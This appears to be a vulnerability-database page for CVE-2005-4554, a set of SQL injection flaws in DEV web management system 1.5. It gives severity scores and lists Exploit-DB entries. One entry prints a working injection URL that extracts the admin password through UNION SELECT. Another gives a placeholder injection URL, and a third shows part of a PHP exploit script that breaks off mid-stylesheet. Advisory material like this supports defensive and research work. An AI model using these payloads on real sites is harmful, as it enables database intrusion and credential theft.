CVE-2005-4554
published 2005-12-28CVE-2005-4554: Multiple SQL injection vulnerabilities in DEV web management system 1.5 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) cat…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.85%
88.8th percentile
Multiple SQL injection vulnerabilities in DEV web management system 1.5 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) cat parameter in an openforum action (openforum.php) in index.php, (2) cat parameter in getfile.php, and (3) target parameter in download_now.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dev | dev_web_management_system | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Dev Web Management System 1.5 - 'getfile.php?cat' SQL Injection
exploitdb·2005-12-27
CVE-2005-4554 Dev Web Management System 1.5 - 'getfile.php?cat' SQL Injection
Dev Web Management System 1.5 - 'getfile.php?cat' SQL Injection
---
source: https://www.securityfocus.com/bid/16063/info
Dev Web Management System is prone to multiple input validation vulnerabilities. These issues may allow SQL injection and cross-site scripting attacks.
Dev Web Management System versions 1.5 and earlier are prone to these issues.
http://example.com/[path]/getfile.php?cat=%%'UNION%20SELECT%20value,value%20FROM%20variables1%20%20WHERE%20name='admin_password'/*
Exploit-DB
Dev Web Management System 1.5 - 'download_now.php?target' SQL Injection
exploitdb·2005-12-27
CVE-2005-4554 Dev Web Management System 1.5 - 'download_now.php?target' SQL Injection
Dev Web Management System 1.5 - 'download_now.php?target' SQL Injection
---
source: https://www.securityfocus.com/bid/16063/info
Dev Web Management System is prone to multiple input validation vulnerabilities. These issues may allow SQL injection and cross-site scripting attacks.
Dev Web Management System versions 1.5 and earlier are prone to these issues.
http://example.com/[path]/download_now.php?target=9999999999999[SQL]
Exploit-DB
Dev Web Management System 1.5 - 'cat' SQL Injection
exploitdb·2005-12-24
CVE-2005-4554 Dev Web Management System 1.5 - 'cat' SQL Injection
Dev Web Management System 1.5 - 'cat' SQL Injection
---
this works regardless of magic_quotes_gpc setting #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# Sun-Tzu: "Prohibit the taking of omens, and do away with superstitious #
# doubts. Then, until death itself comes, no calamity need be feared." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 5);
ob_implicit_flush (1);
echo'********* Dev
body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !i
No writeups or analysis indexed.
http://rgod.altervista.org/dev_15_sql_xpl.htmlhttp://secunia.com/advisories/18239http://securitytracker.com/id?1015410http://www.osvdb.org/22040http://www.osvdb.org/22041http://www.osvdb.org/22042http://www.securityfocus.com/archive/1/420253/100/0/threadedhttp://www.securityfocus.com/bid/16063https://exchange.xforce.ibmcloud.com/vulnerabilities/23898http://rgod.altervista.org/dev_15_sql_xpl.htmlhttp://secunia.com/advisories/18239http://securitytracker.com/id?1015410http://www.osvdb.org/22040http://www.osvdb.org/22041http://www.osvdb.org/22042http://www.securityfocus.com/archive/1/420253/100/0/threadedhttp://www.securityfocus.com/bid/16063https://exchange.xforce.ibmcloud.com/vulnerabilities/23898
2005-12-28
Published